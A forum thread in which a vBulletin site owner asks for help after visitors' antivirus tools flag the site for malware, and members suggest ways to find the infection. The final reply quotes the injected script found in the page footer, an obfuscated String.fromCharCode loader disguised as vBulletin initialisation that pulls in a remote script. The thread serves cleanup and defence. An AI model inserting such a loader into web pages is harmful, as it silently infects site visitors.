Malware showing on site

[dazzled]

Hey guys,

My forum members recently reported that when they go to the site, (logged in or not) they get a notification that malware has been detected and caught by their antivirus. I use avast, and have been getting the same issue.

I ran a scan on Surucri, and these are the results: http://sitecheck.sucuri.net/results/caiqueforum.com

The malware detection that pops up with Avast names this url as the offending subject: "directmarkering12linear.in/in.cgi?walter"

I've searched my site files for the above URL, and not found anything. I'm at a loss, and members are avoiding the site now until the malware has been taken care of.

How can I get rid of this crap?

[Max Taxable]

Try your site on this:

http://www.webpagetest.org/

It will give you a complete picture of every request, all errors, etc. This is likely coming from third party advertising.

[Keev]

Not sure what that tool is suppose to tell ya... doesn't say the location of where to remove infections.... I have looked over the footer files where normally they like to inject a line of code and nothing

[dazzled]

Yes it gives a complete picture of the fact that there are errors but it doesn't show where the malicious code is embedded and when I manually examine the files I can't pinpoint any malicious code.

[kh99]

I'm not an expert on this kind of thing, but: check the plugin manager for any plugins you don't recognize - you could also try disabling plugins and see if that removes the malware (if it does you still need to find the plugin, of course). It wouldn't hurt to re-upload all your vb files (assuming you haven't made any changes to them of course). And there's also this script: https://vborg.vbsupport.ru/showthread.php?t=220967 which recompiles any templates where the compiled version has changed (someone with access to the db can hide stuff in the compiled templates that you'll never see unless you look in the database). That mod is for vb3, but I think it just needs a minor change to work in vb4 (I posted the change in post#74 of that thread).

ETA: oh, also you can run (from the adminCP) Maintenance -> Diagnostics -> Suspect File Versions to make sure there aren't any files on your server that shouldn't be there.

Of course the most important thing it to try to figure out how the stuff got there in the first place or it's likely to happen again after you clean up. At the very least you should change your passwords, I would think.

[Max Taxable]

Quote:

Originally Posted by dazzled

Yes it gives a complete picture of the fact that there are errors but it doesn't show where the malicious code is embedded and when I manually examine the files I can't pinpoint any malicious code.

The offending object you posted,

PHP Code:

"directmarkering12linear.in/in.cgi?walter" 


Should be showing in either the waterfall or the detailed breakdown.

[Simon Lloyd]

You have injected code or infected php, at the bottom of your source code you have this

HTML Code:

<script type="text/javascript">
	<!--
		// Main vBulletin Javascript Initialization
		var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
	//-->
	</script>

when it should look like this

HTML Code:

<script type="text/javascript">
	<!--
		// Main vBulletin Javascript Initialization
		vBulletin_init();
	//-->
	</script>

Check your php files for Eval(base64 code